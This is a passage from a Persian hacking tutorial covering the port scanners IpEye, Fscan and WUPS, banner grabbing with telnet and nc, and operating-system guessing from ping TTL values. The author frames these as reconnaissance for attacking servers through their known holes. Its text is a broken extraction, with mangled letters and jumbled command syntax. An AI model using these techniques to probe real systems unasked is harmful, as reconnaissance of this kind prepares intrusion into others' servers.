اوﻟﻴﻦ ﺷﻤﺎرﻩ ﭘﻮرت ﻣﻮرد ﻧﻈﺮ و ﺁﺧﺮیﻦ ﺁن ﻣﺤﺪودﻩ ﻣﻮرد ﻧﻈﺮ ﺧﻮد را ﭘﻮیﺶ ﮐﻨﻴﺪ. -۴ﻧﺮم اﻓﺰار : IpEye ﺏﺮﻧﺎﻣﻪ ﺏﻌﺪی ﮐﻪ ﻣﻴﺨ ﻮاهﻢ ﻣﻌﺮﻓ ﯽ ﮐ ﻨﻢ ﮐ ﻪ ﺕ ﺎ ﺡ ﺪودی از دو ﺏﺮﻧﺎﻣ ﻪ ﺏ ﺎﻻ ) Net Scan Toolsو ( Super Scanﻗ ﻮی ﺕ ﺮ ﺏ ﻮدﻩ و ﻣﮑ ﺎﻧﻴﺰم ه ﺎی ﭘﻮیﺶ ﻣﺨﻔﻴﺎﻧﻪ را هﻢ ﺕﺎ ﺡﺪودی ﭘﺸﺘﻴﺒﺎﻧﯽ ﻣﻴﮑﻨﺪ ﻋﺒﺎرت اﺱﺖ از IpEyeﮐﻪ ﻣﺜﻞ ﺏﻘﻴﻪ اﺏﺰار هﺎی ﺧﻮب ﺕﺤﺖ ﺧﻂ ﻓﺮﻣﺎن اﺟﺮا ﻣﻴﺸﻮد . ایﻦ ﺏﺮﻧﺎﻣﻪ ﻣﮑﺎﻧﻴﺰم هﺎی SYSو FINو Xmas treeو nullرا در اﺧﺘﻴﺎر ﮐﺎرﺏﺮ ﻗﺮار ﻣﻴﺪهﺪ و از ایﻨﺠﺎ ﻣﻴﺘﻮاﻧﻴﺪ ﺁن را ﺕﻬﻴﻪ ﮐﻨﻴﺪ. ﺏﻌﺪ از اﺟﺮای ﺏﺮﻧﺎﻣﻪ ﺷﻤﺎ یﮏ هﻤﭽﻴﻦ ﭼﻴﺰی ﻣﻴﺒﻴﻨﻴﺪ ﮐﻪ ﻣﻦ ﺟﺎهﺎی ﻣﻬﻢ ﺁن را ﺕﻮ ﭘﺮ ﮐﺮدﻩ ام : )ipEye 1.2 - (c) 2000-2001, Arne Vidstrom ([email protected] - http://ntsecurity.nu/toolbox/ipeye/ Error: Too few parameters. Usage: ]ipEye <scantype> -p <port> [optional parameters >ipEye <scantype> -p is one of the following: )
)
ﭘﻮﻳﺶ ﳐﻔﻴﺎﻧﻪ دﺳﺖ ﺗﮑﺎﻧﯽ دو ﻣﺮﺡﻠﻪ ای ( = SYN scan
-syn
) ﻧﻘﺾ اﺻﻮل ﭘﺮوﺗﮑﻞ ﺑﻪ درد وﻳﻨﺪوز ﳕﯽ ﺧﻮرد ( = FIN scan
-fin
ﻧﻘﺾ اﺻﻮل ﭘﺮوﺗﮑﻞ ﺑﻪ درد وﻳﻨﺪوز ﳕﯽ ﺧﻮرد( -null = Null scan
) ﻧﻘﺾ اﺻﻮل ﭘﺮوﺗﮑﻞ
ﺑﻪ درد وﻳﻨﺪوز ﳕﯽ ﺧﻮرد ( >-xmas = Xmas scan>br
(note: FIN, Null and Xmas scans don't work against Windows systems.
[optional parameters] are selected from the following: = source IP for the scan
>-sip <source IP
-sp <source port> = source port for the scan = delay between scanned ports in milliseconds
>-d <delay in ms
)(default set to 750 ms
ﺧﻮب ﺡﻘﻴﻘﺘًﺎ ﺏﻪ ﺧﺪا زور دارد یﮏ ﻣﻄﻠﺐ ۴٠ﺏﺎر ﺕﮑﺮار ﮐﻨﻴﺪ ﺕﻮ یﮏ ﻣﻘﺎﻟﻪ ) ﺧﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻠﯽ ﺱﺨﺖ ﺕﺎیﭗ ﮐﺮدن(. هﻤﺎﻧﻄﻮر ﮐﻪ در ﺏﺎﻻ ﻣﺸﺎهﺪﻩ ﻣﯽ ﮐﻨﻴﺪ ﺷﮑﻞ ﻋﻤﻮﻣﯽ ایﻦ دﺱﺘﻮر در ایﻦ ﺏﺮﻧﺎﻣﻪ ایﻦ ﺷﮑﻠﯽ : ]ipEye <scantype> -p <port> [optional parameters >ipEye <scantype> -p
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٣٨
ﺧﻮب در ﺟﻮاب ایﻦ ﺏﺮﻧﺎﻣﻪ ﺟﻠﻮی هﺮ یﮏ از ﭘﻮرت هﺎ یﮏ واژﻩ ای ﻣﻴﻨﻮیﺴﺪ ﮐﻪ ﻣﻌﺮف ﭼﻴﺰی اﺱﺖ ﮐﻪ ﺁن را هﻢ ﻣﻴﮕﻮیﻢ. واژﻩ Closedیﻌﻨﯽ ﮐﺎﻣﭙﻴﻮﺕﺮ در ﺁن ﻃﺮف هﺴﺖ وﻟﯽ ﺏﻪ ﭘﻮرت ﮔﻮش ﻧﻤﯽدهﺪ !! واژﻩ Rejectیﻌﻨﯽ ایﻨﮑﻪ یﮏ ) firewallدیﻮار ﺁﺕﺶ (هﺴﺖ ﮐﻪ اﺟﺎزﻩ اﺕﺼﺎل ﺏﻪ ﺁن ﭘﻮرت را ﻧﻤﯽدهﺪ یﺎ ﭼﻴﺰی ﻣﺜﻞ ﺁن !! واژﻩ Dropیﻌﻨﯽ ایﻨﮑﻪ یﮏ دیﻮار ﺁﺕﺶ یﺎ ﭼﻴﺰی ﻣﺜﻞ ﺁن هﻤﻪﭼﻴﺰ را ﭘﺲ ﻣﯽزﻧﺪ و یﺎ اﺻﻼ ﮐﺎﻣﭙﻴﻮﺕﺮی اوﻧﻮر ﻧﻴﺴﺖ !! واژﻩ Openهﻢ ﮐﻪ یﻌﻨﯽ ایﻨﮑﻪ ﺁن ﭘﻮرت ﺏﺎز !! -۵ﺏﺮﻧﺎﻣﻪ : Fscan ﺏﺮﻧﺎﻣﻪ ﺏﻌﺪی ﮐﻪ ﻗﺴﻂ ﻣﻌﺮﻓﯽ ﺁن را دارم ﺏﺮﻧﺎﻣﻪ FScanاﺱﺖ ﮐﻪ ﺏﺮای ﭘ ﻮیﺶ ﭘ ﻮرت ه ﺎی UDPﮐ ﺎرﺏﺮد دارد .ﮐ ﻪ ﮐ ﺎر ﺏ ﺎ ﺁن ﺕﺤ ﺖ ﺧ ﻂ ﻓﺮﻣ ﺎن اﻣﮑﺎن ﭘﺬیﺮ ﺏﻮدﻩ و اﻟﺒﺘﻪ ﺧﻴﻠﯽ راﺡﺖ اﺱﺖ و ﺷﮑﻞ ﻋﻤﻮﻣﯽ دﺱﺘﻮر در ﺁن ﺏﻪ ﺻﻮرت زیﺮ ﻣﻴﺒﺎﺷﺪ: >Fscan –u –
ﺧﻮب ﻓﻘﻂ ایﻦ ﺕﻮﺽﻴﺢ ﺏﺪهﻢ ﮐﻪ یﮏ دﻓﻌﻪ اﺷﺘﺒﺎﻩ ﻧﮑﻨﻴﺪ .ﻗﺴﻤﺖ ١ﮐﻪ در ﺷﮑﻞ ﻣﺸﺎهﺪﻩ ﻣﯽ ﮐﻨﻴﺪ ﺏﺮای ﻣﺸﺨﺺ ﮐ ﺮدن رﻧ ﺞ IPاﺱ ﺖ و ﻗ ﺴﻤﺖ ٢ه ﻢ ﺏﺮای ﻣﺸﺨﺺ ﮐﺮدن رﻧﺞ ﭘﻮرت هﺎ اﺱﺖ .ﮔﺰیﻨﻪ Intervalهﻢ وﻗﻔ ﻪ زﻣ ﺎﻧﯽ را ﮐ ﻪ ﺏ ﻴﻦ ه ﺮ ﭘ ﻮیﺶ IPﺏﺎی ﺪ ﻣﻨﺘﻈ ﺮ ﺏﺎﺷ ﺪ را ﻣ ﺸﺨﺺ ﻣ ﯽ ﮐﻨ ﺪ .در ﻗﺴﻤﺖ Configهﻢ ﻣﻴﺘﻮاﻧﻴﺪ دﻧﺒﺎل اﺱﺐ ﺕﺮوا BO2Kﺏﮕﺮدیﺪ و.. ﮐﺎر ﺏﺎ ایﻦ ﺧﻴﻠﯽ ﺱﺎدﻩ . ﺁﺧﺮیﻦ اﺏﺰار ﭘﻮیﺶ ﭘﻮرﺕﯽ ﮐﻪ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ اﺏﺰار WUPSاﺱﺖ.ایﻦ اﺏﺰار ﺕﻮﺱ ﻂ دوﺱ ﺖ ﺧ ﻮﺏﻢ ﺁﻗ ﺎی ) Arne Vidstromهﻤ ﺎن ﺕﻮﺱ ﻌﻪ دهﻨ ﺪﻩ اﺏﺰار ( IpEyeﻃﺮاﺡﯽ و ﺕﻮﺱﻌﻪ یﺎﻓﺘﻪ اﺱﺖ .ایﻦ اﺏﺰار هﻢ ﮔﺮاﻓﻴﮑﯽ اﺱﺖ !! ایﻦ ﺏﺮﻧﺎﻣﻪ یﮏ ﻣ ﺸﮑﻞ ﮐﻮﭼﻮﻟ ﻮ دارد و ﺁن ﻋ ﺪم ﺕﻮاﻧ ﺎیﯽ ﭘ ﻮیﺶ ی ﮏ رﻧﺞ IPاﺱﺖ اﻟﺒﺘﻪ اﺏﺰار ﺏﺎﻻی را ﺏﻪ هﻤﻴﻦ ﺧﺎﻃﺮ اول ﻣﻌﺮﻓﯽ ﮐﺮدم.ﮐﺎر ﺏﺎ ایﻦ یﮑﯽ واﻗﻌًﺎ ﺱﺎدﻩ اﺱﺖ .ﭘﺲ ﻣﻦ ﺏﻪ هﻤﻴﻦ ﺧﺎﻃﺮ دیﮕﻪ ﺕﻮﺽﻴﺢ ﻧﻤﻴﺪهﻢ در ﺏﺎرﻩ ایﻦ اﺏﺰار. ﺧﻮب ﺕﺎ ﺏﻪ ایﻦ ﺟﺎ یﮏ ﺱﺮی ﻧﺮم اﻓﺰار در ﺏﺎرﻩ ﭘﻮیﺶ ﭘﻮرت و ﭘﻮیﺶ IPﺏﻪ ﻣﻨﻈﻮر ایﻨﮑﻪ اﺻﻼ ﺁیﺎ ﻣﺎﺷﻴﻦ ﻓﻌﺎل هﺴﺖ یﺎ ﻧ ﻪ و ی ﺎ اﮔ ﺮ ﻓﻌ ﺎل ه ﺴﺖ ﭼﻪ ﭘﻮرت هﺎیﯽ از ﺁن ﺏﺎز اﺱﺖ و ...ﺏﻪ ﺷﻤﺎ ﻣﻌﺮﻓﯽ ﮐﺮدم و ﺁﻣﻮزش ﻧﻴﺰ دادم.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٣٩
ﺡﺎﻻ هﻨﻮز ﻣﺎ در ﻣﺮﺡﻠﻪ ﺟﻤﻊ ﺁوری اﻃﻼﻋﺎت ﭘﺎیﻪ از هﺪف هﺴﺘﻴﻢ ی ﮏ ﮔ ﺎم دیﮕ ﺮ و اﻟﺒﺘ ﻪ ﺁﺧ ﺮیﻦ ﮔ ﺎم از ﻣﺮﺡﻠ ﻪ ﮐﻠ ﯽ ﺟﻤ ﻊ ﺁوری اﻃﻼﻋ ﺎت ،ﮐ ﻪ اﻟﺒﺘﻪ ﺧﻴﻠﯽ راﺡﺖ اﺱﺖ و ﺏﺴﻴﺎر ﺏﺎ ارزش ﮐ ﻪ ﻣﻌﻤ ﻮﻻ ه ﻢ ﻧﺎدی ﺪﻩ ﮔﺮﻓﺘ ﻪ ﻣﻴ ﺸﻮد ﻣﺮﺡﻠ ﻪ " ﺟﻤ ﻊ ﺁوری اﻃﻼﻋ ﺎت ﺏ ﻪ روش " Grabbing Banner اﺱﺖ. ﺟﻤﻊ ﺁوری اﻃﻼﻋﺎت ﺏﻪ روش Grabbing Banner ﻣﻘﺪﻣﻪ : در ﮔﺬﺷﺘﻪ ﻧﻪ ﭼﻨﺪان دور ،ﺟﻤﻊ ﺁوری اﻃﻼﻋﺎت از ﺱﻴﺴﺘﻢ هﺎی هﺪف ﺏﺎ ﺱﺨﺘﯽ ﺁن ﭼﻪ اﻣﺮوز ﺷﺎﻩ ﺁن هﺴﺘﻴﻢ ،ﻧﺒﻮد .ﺕﺎ هﻤﻴﻦ ﭼﻨﺪ ﺻﺒﺎح ﭘﻴﺶ اﺻﻼ ) ﺏﻪ ﻏﻴﺮ از ﺱﺎیﺖ هﺎی ﻣﻬﻢ و ﻣﻌﺮوف ( ﻣﺪیﺮان ﺱﺎیﺘﻬﺎ ﺡﺴﺎﺱﻴﺖ ﺧﺎﺻﯽ در ایﻦ ﺏﺎرﻩ ﻧﺪاﺷﺘﻨﺪ و ﺁدم ﺏﺎ یﮏ Telnetﺱﺎدﻩ یﮏ دو ﺟﻴﻦ اﻃﻼﻋﺎت از ﺟﻤﻠﻪ ﻧﺎم ﻣﻴﺰﺏﺎن ،ﻧﻮع ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ و ﺷﻤﺎرﻩ ﻧﺴﺨﻪ ﺁن و ...را ﺏﻪ ﻃﻮر ﺁزاد در اﺧﺘﻴﺎر ﮐﺎرﺏﺮ ﻗﺮار ﻣﻴﺪادﻧﺪ.اﺱﺎس ﮐﺎر در ایﻦ روش ﺏﺮﭘﺎیﻪ اﺕﺼﺎل ﺏﻪ ﭘﻮرت ﺏﺎز اﺱﺖ ﭼﻮن اﺻﻮﻻ هﻨﮕﺎﻣﯽ یﮏ ﭘﻮرت ﺏﺎز اﺱﺖ ﮐﻪ یﮏ ﺱﺮویﺲ دهﻨﺪﻩ ) یﮏ ﻧﻮع ﻧﺮم اﻓﺰار ﮐﺎرﺏﺮدی( ﺁن را ﺏﺎز ﮐﺮدﻩ اﺱﺖ ﺕﺎ ﺏﺎ ﺷﺒﮑﻪ ﺕﻌﺎﻣﻞ ﮐﻨﺪ !!! ﺧﻮب اﮔﺮ ﻣﺎ ﺏﻪ ﺁن ﭘﻮرت ﻣﺘﺼﻞ ﺷﻮیﻢ ﺕﺎ ﺏﺒﻴﻨﻴﻢ ﮐﺪام ﺱﺮویﺲ دهﻨﺪﻩ ﺁن را ﺏﺎز ﮐﺮدﻩ اﺱﺖ و ﺷﻤﺎرﻩ ﻧﺴﺨﻪ ﺁن را ﺏﻔﻬﻤﻴﻢ ﻣﻴﺘﻮاﻧﻴﻢ ﺏﺎ اﺱﺘﻔﺎدﻩ از ﻧﻘﻄﻪ ﺽﻌﻒ هﺎی ﺁن ﺱﻴﺴﺘﻢ ﺁن را ﻣﻮرد ﺕﻬﺎﺟﻢ ﻗﺮار ﺏﺪهﻴﻢ .اﻟﺒﺘﻪ در %۵٠ﻣﻮارد ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ هﻢ ﻣﻴﺘﻮان ﺷﻨﺎﺱﺎیﯽ ﮐﺮد ﮐﻪ ﺁن هﻢ ﻣﺜﻞ ﺏﺎﻻی ﻣﻴﺸﻮد ﺏﺎهﺎش ﺕﻌﺎﻣﻞ ﮐﺮد ﺁن هﻢ از ﻧﻮع ﻣﻮرد ﻋﻼﻗﻪ ﺧﻮدﻣﻮن. اﻣﺮوزﻩ ﺏﺮﻧﺎﻣﻪ telnetﮐﻢ ﺏﻴﺶ ﺏﺎ ﺏﺮﻧﺎﻣﻪ دیﮕﺮی ﮐﻪ ﺕﺨﺼﺼﯽ اﺱﺖ ﺟﺎیﮕﺰیﻦ ﺷﺪﻩ اﺱﺖ از ﺟﻤﻠﻪ ﻣﻴﺘﻮان ﺏﻪ ﻣﻮارد زیﺮ اﺷﺎرﻩ ﮐﺮد : در ﻣﻮارد ﺏﺪﺱﺖ ﺁوری اﻃﻼﻋﺎت از ﭘﺮوﺕﮑﻞ SHHﺏﺎ ﻋﻨﻮان Secure Shellیﺎ اﺻﻄﻼﺡﺎ ، SHHاﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد. در ﻣﻮرد ﭘﺴﺖ اﻟﮑﺘﺮوﻧﻴﮑﯽ از ﺏﺮﻧﺎﻣﻪ elm mailو یﺎ از ﺏﺮﻧﺎﻣﻪ pineﺟﻬﺖ اﺕﺼﺎل ﺏﻪ ﺱﺮور ﭘﺴﺖ اﻟﮑﺘﺮوﻧﻴﮑﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد. ﺏﺮای اﺕﺼﺎل ﺏﻪ وب ﺱﺮور از ﺏﺮﻧﺎﻣﻪ Lynxاﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد. اﻟﺒﺘﻪ از ایﻦ دﺱﺖ ﺏﺮﻧﺎﻣﻪ ﺏﺴﻴﺎر اﺱﺖ ﮐﻪ ﺏﺮﻧﺎﻣﻪ هﺎ ﻧﻮﻋﯽ ﮐﻼیﻨﺖ ﺏﺮای ﺱﺮویﺲ دهﻨﺪﻩ ﺧﺎﺻﯽ هﺴﺘﻨﺪ ،ﺕﻘﺮیﺒﺎ در ﺏﻴﺸﺘﺮ ﻣﻮارد ﻣﻴﺘﻮان ﺏﻪ ﺟﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ ﺽﻌﻴﻒ ) ( telnetاز NCاﺱﺘﻔﺎدﻩ ﮐﺮد .اﻟﺒﺘﻪ ایﻦ ﺏﺮﻧﺎﻣﻪ هﺎ ﭼﻪ ﮐﻼیﻨﺖ هﺎ و یﮑﺴﺮی اﻃﻼﻋﺎت را ﺏﺪﺱﺖ ﻣﯽ ﺁورﻧﺪ و ﺏﺮﻧﺎﻣﻪ NCو یﺎ telnetیﮏ ﺱﺮی دیﮕﺮ ﮐﻪ ﮔﺮوﻩ اول از ﺏﺪﺱﺖ ﺁوری ﺁﻧﻬﺎ ﻧﺎﮐﺎم ﻣﻴﻤﺎﻧﺪ .ﭘﺲ ﻣﻦ ﺏﻪ ﺷﻤﺎ ﺕﻮﺻﻴﻪ ﻣﻮﮐﺪ ﻣﻴﮑﻨﻢ از هﺮ دو ﻧﻮع اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﻧﻪ یﮏ ﻧﻮع از ﺁﻧﻬﺎ. اﻟﺒﺘﻪ ایﻦ را ذﮐﺮ ﮐﻨﻢ ﭘﻮیﺶ ﮔﺮ هﺎی ﭘﻮرت ﻣﻌﻤﻮﻻ ایﻦ ﮐﺎر را اﻧﺠﺎم ﻣﻴﺪهﻨﺪ وﻟﯽ ﻣﻦ ﺕﺠﺮﺏﻪ ﺏﻪ ﺧﻮدم ﺙﺎﺏﺖ ﮐﺮدﻩ ﮐﻪ ﺏﺎیﺪ هﻤﻴﺸﻪ اﮔﺮ ﮐﺎری را ﻣﻴﺘﻮاﻧﻴﺪ ﺧﻮدﺕﺎن اﻧﺠﺎم دهﻴﺪ ﺡﺘﻤﺎ ،ﺧﻮد اﻧﺠﺎم دهﻴﺪ ﻧﻪ ایﻨﮑﻪ ﺏﺮ ﻋﻬﺪﻩ ﻧﺮم اﻓﺰار ﺏﮕﺰاریﺪ ﭼﻮن ان ﻧﺮم اﻓﺰار ﺷﻌﻮر ﻧﺪارد و ﻓﻘﻂ ﻣﺴﺌﻠﻪ هﺎی را ﺡﻞ ﻣﻴﮑﻨﺪ ﮐﻪ یﮏ دﻓﻌﻪ ﺏﺮﻧﺎﻣﻪ ﻧﻮیﺲ ان ﺏﺮایﺶ ﺡﻞ ﮐﺮدﻩ ﺏﺎﺷﺪ. ﺏﺮای ﻣﺘﺼﻞ ﺷﺪن ﺏﻪ یﮏ ﭘﻮرت ﺏﺎ اﺱﺘﻔﺎدﻩ از ﺏﺮﻧﺎﻣﻪ telnetاز ﺷﮑﻞ ﻋﻤﻮﻣﯽ دﺱﺘﻮر زیﺮ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ : telnet hostname port number و ﺏﺮای ﻣﺘﺼﻞ ﺷﺪن ﺏﻪ یﮏ ﭘﻮرت ﺏﺎ اﺱﺘﻔﺎدﻩ از ﺏﺮﻧﺎﻣﻪ NCاز ﺷﮑﻞ ﻋﻤﻮﻣﯽ دﺱﺘﻮر زیﺮ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ : ]NC [-options] hostname port[s ﮐﻪ در ایﻦ ﻣﻮرد ﺏﻪ ﺟﺎی ] [-optionsﻣﺎ ﻓﻌﻼ ﺱﻮیﭻ –vرا ﻣﻴﮕﺰاریﻢ ﺏﻘﻴﻪ ﭼﻴﺰهﺎ هﻢ ﮐﻪ ﺕﺎﺏﻠﻮ .اﻟﺒﺘﻪ ایﻦ را ذﮐﺮ ﮐﻨﻢ ﺏﻌﺪ از ﭘﺎیﺎن هﻤﻴﻦ ﻣﻄﻠﺐ ﺁﻣﻮزش ﮐﺎﻣﻞ NCرا ﻣﻴﺪهﻢ. یﮏ ﻣﺜﺎل ﻣﻴﺰﻧﻢ ﺕﺎ ﻗﻀﻴﻪ روﺷﻦ ﺷﻮد ،ﻣﺎ ﻣﻴﺨﻮاهﻴﻢ ﺏﺎ ﺏﺮﻧﺎﻣﻪ NCو telnetﺏﻪ یﮏ ﻣﺎﺷﻴﻦ ﺏﺎ ﭘﻮرت ٢١ﮐﻪ FTPاﺱﺖ ﻣﺘﺼﻞ ﺷﻮیﻢ: C :\> telnet xxx.xxx.xxx.xxx 21 C :\> NC –v xxx.xxx.xxx.xxx 21 ﺧﻮب در ﺟﻮاب ﺏﺮﻧﺎﻣﻪ اول ایﻦ ﮔﻮﻧﻪ ﺟﻮاب ﻣﻴﺪهﺪ : Connected to xxxxxxxxxx 220 ftp29 FTP server (UNIX(r) System V Release4.0) ready. SYST 215 UNIX Type: L8 Version: SUNOS ﺧﻮب ﻣﺎ ﻓﻬﻤﻴﺪیﻢ ﮐﻪ ایﻦ ﺱﺮور از ﭼﻪ ﻧﻮع ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ و از ﭼﻪ ﺏﺮﻧﺎﻣﻪ ای ﺏﺮای ﺱﺮویﺲ دهﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ ).ﺏﺮای ان هﺎیﯽ ﮐﻪ ﺧﻴﻠﯽ ﻋﺠﻮل اﻧﺪ در ایﻦ ﻣﺮﺡﻠﻪ ﻣﻴﺘﻮاﻧﻨﺪ ﺏﺮوﻧﺪ و دﻧﺒﺎل ﺡﻔﺮﻩ هﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ و Exploitﺏﺮای ﺁن ﺏﮕﺮدﻧﺪ ﺕﺎ ﺱﺮور هﮏ ﮐﻨﻨﺪ( ﺏﺮ ﻧﺎﻣﻪ Ncهﻢ ﻣﻴﻦ ﺟﻮری ﺟﻮاب ﻣﻴﺪهﺪ ﮐﻪ ﻣﻦ دیﮕﻪ از ﺁﺕﻦ ﺻﺮف ﻧﻈﺮ ﮐﺮدم ایﻦ ذﮐﺮ ﮐﻨﻢ ایﻦ ﺏﺮﻧﺎﻣﻪ ) ( NCﺧﻴﻠﯽ ﺏﻬﺘﺮ از telnetﺟﻮاب ﻣﻴﺪهﺪ .اﻟﺒﺘﻪ ﻗﺎﺏﻞ ذﮐﺮ اﺱﺖ هﻤﺎﻧﮕﻮﻧﻪ ﮐﻪ در ﺏﺎﻻ ﮔﻔﺘﻢ ﺕﻤﺎم و یﺎ ﺏﻪ ﻋﺒﺎرت ﺏﻬﺘﺮی اﮐﺜﺮ ﭘﻮیﺶ ﮔﺮهﺎی ﭘﻮرت ایﻦ ﮔﻮﻧﻪ ﮐﺎر هﺎ را اﻧﺠﺎم ﻣﻴﺪهﻨﺪ. ﺏﺮای اﺕﺼﺎل ﺏﻪ ﭘﻮرت ٨٠ﺏﺎیﺪ ﺏﻌﺪ از ﺏﺮﻗﺮاری ارﺕﺒﺎط ﻣﺎ یﮏ ﺱﺮی دﺱﺘﻮر ﺏﺮای ﺁن ﺏﺎ اﺱﺘﻔﺎدﻩ از ﭘﺮوﺕﮑﻞ HTTPیﺎ اﺻﻄﻼﺡﺎ اﻧﺘﻘﺎل ﻣﺤﺘﻮای ﻓﺮا ﻣﺘﻦ ) ( Hyper Text Transfer Protocolﺡﻮاﻟﻪ وب ﺱﺮور ﮐﻨﻴﻢ .ﺏﻪ ﻣﺜﺎل زیﺮ ﺕﻮﺟﻪ ﮐﻨﻴﺪ : C :\> Telnet.exe xxx.xxx.xxx.xxx 80 Connecting To xxx.xxx.xxx.xxx HTTP/ 1.1 200 OK Date: Tue. 29 Jun 2002 07:18:07
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٤٠
)Server: Apache /1.3.14 (UNIX) (Red-hat/Linux …. ﺧﻮب ﻣﻦ ایﻦ ﺟﻮاب را ﮐﻮﺕﺎﻩ ﮐﺮدم و ﺁﺧﺮش ﺏﻪ ﻣﺎ یﮏ ﭘﻴﻐﺎم ﻣﻴﺪهﺪ ﮐﻪ ﺡﺎوی ایﻦ ﻣﻮﺽﻮع اﺱﺖ ﮐﻪ " ﺱﺮویﺴﯽ در روی ﭘﻮرت ٨٠در ﺡﺎل اﺟﺮا اﺱﺖ " !!! ﺧﻮب در ایﻦ ﺡﺎﻟﺖ ایﻦ ﺱﺮویﺲ ﭼﻮن ﻣﺎ ﺏﺎ اون ارﺕﺒﺎط ﺏﺮﻗﺮار ﮐﺮدیﻢ ﻣﻴﺨﻮاهﺪ ﺏﺒﻴﻨﻪ ﻣﺎ ﭼﻪ ﻣﻴﮕﻴﻢ و یﺎ ﺏﻪ ﻋﺒﺎرﺕﯽ از ﻣﺎ یﮏ ﻓﺮﻣﺎن ﻣﻴﺨﻮاهﺪ .ﺧﻮب ﻣﺎ ﻓﺮﻣﺎن GETرا ﻧﻮﺷﺘﻪ ﺏﻌﺪ دو ﺏﺎر Enterزدﻩ اﻟﺒﺘﻪ ﺟﻠﻮی ایﻦ ﻓﺮﻣﺎن یﮏ ﭼﻴﺰی ﻣﻴﻨﻮیﺴﻴﻢ .در ﺟﻮاب ﭼﻮن ﻣﺎ ﺟﻠﻮی ﻓﺮﻣﺎن را ﭼﺮﻧﺪ ﭘﺮﻧﺪ ﻧﻮﺷﺘﻴﻢ ﺏﻪ ﻣﺎ یﮏ ﺟﻮاب ﻣﻴﺪهﺪ ﮐﻪ در ﺁن ﺟﻮاب ﻣﺎ ﺏﺎیﺪ دﻧﺒﺎل هﺪر ﭘﺮوﺕﮑﻞ ﺏﮕﺮدیﺪ .ایﻦ از ایﻦ. ایﻦ را ذﮐﺮ ﮐﻨﻢ وﻗﺘﯽ ﻣﻦ ﺏﻪ ﺱﺮویﺲ Telnetهﻤﻴﻦ ﻣﺎﺷﻴﻦ وﺻﻞ ﺷﺪم اﻃﻼﻋﺎﺕﯽ را ﮐﻪ ﺏﺮای ﻣﻦ ﻓﺮﺱﺘﺎد ﺏﺴﻴﺎر دروﻏﻴﻦ ﺏﻮد ﭼﻮن ﺁن را دﺱﺖ ﮐﺎری ﮐﺮدﻩ ﺏﻮدن و ﻓﺎیﻞ /etc/issue.netرا ﭘﺮ از هﺪر هﺎ و ﺏﺮﭼﺴﺐ هﺎی دروغ ﻧﻮﺷﺘﻪ ﺏﻮدن ﮐﻪ ایﻦ ﮐﺎر ﮐﺎﻣﻼ ﻋﻤﻠﯽ اﺱﺖ ﭘﺲ ﺕﺎ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﺎیﺪ ﺏﻪ ﻣﺎﺷﻴﻦ هﺪف ﺧﻮدﺕﺎن ﺏﺎ ﭘﻮرت هﺎی ﻣﺨﺘﻠﻒ ﺁن وﺻﻞ ﺷﺪﻩ و ﺏﻌﺪ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﺟﻤﻊ ﺏﻨﺪی ﮐﻪ ﻣﻴﮑﻨﻴﺪ ﻧﻮع ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ و ﺱﺮویﺲ هﺎ را ﺡﺪس ﺏﺰﻧﻴﺪ. در ایﻦ ﻣﺒﺤﺚ یﮏ ﺏﺤﺚ ﮐﻮﭼﻮﻟﻮ دیﮕﺮ ﺏﺎﻗﯽ ﻣﻴﻤﺎﻧﺪ و ﺁن هﻢ ﺷﻨﺎﺱﺎیﯽ ﻧﻮع ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺏﺎ اﺱﺘﻔﺎدﻩ از ارزش TTLدر ﻓﺮﻣﺎن Pingاﺱﺖ ﮐﻪ ﺏﻪ ایﻦ ﺻﻮرت اﺱﺖ ﮐﻪ هﺮ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺕﻘﺮیﺒﺎ ارزش ایﻦ ﻓﻴﻠﺪ ﺧﻮد را در یﮏ ﻣﺤﺪودﻩ ایﯽ ﻗﺮار دادﻩ اﺱﺖ .ﺏﺮای اﺱﺘﻔﺎدﻩ از ایﻦ روش ﺷﻤﺎ ﻓﺮﻣﺎن Pingرا اﺟﺮا ﮐﺮدﻩ و ﺏﻪ ﺱﺘﻮن TTLیﮏ ﻧﮕﺎﻩ ﻣﻴﺎﻧﺪازیﺪ و ﺏﻌﺪ ﺁن را ﺏﺎ ﺟﺪول ﭘﺎیﻴﻦ ﻣﻘﺎیﺴﻪ ﮐﺮدﻩ و ﻧﻮع ﺁن ﺱﻴﺴﺘﻢ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﻴﺪ ﺏﻪ ﻣﺜﺎل زیﺮ ﺕﻮﺟﻪ ﮐﻨﻴﺪ : C:\>ping xxx.xxx.xxx.xxx Pinging xxx.xxx.xxx.xxx with 32 bytes of data: Reply from xxx.xxx.xxx.xxx: bytes=32 time<1ms TTL=128 Reply from xxx.xxx.xxx.xxx: bytes=32 time<1ms TTL=128 Reply from xxx.xxx.xxx.xxx: bytes=32 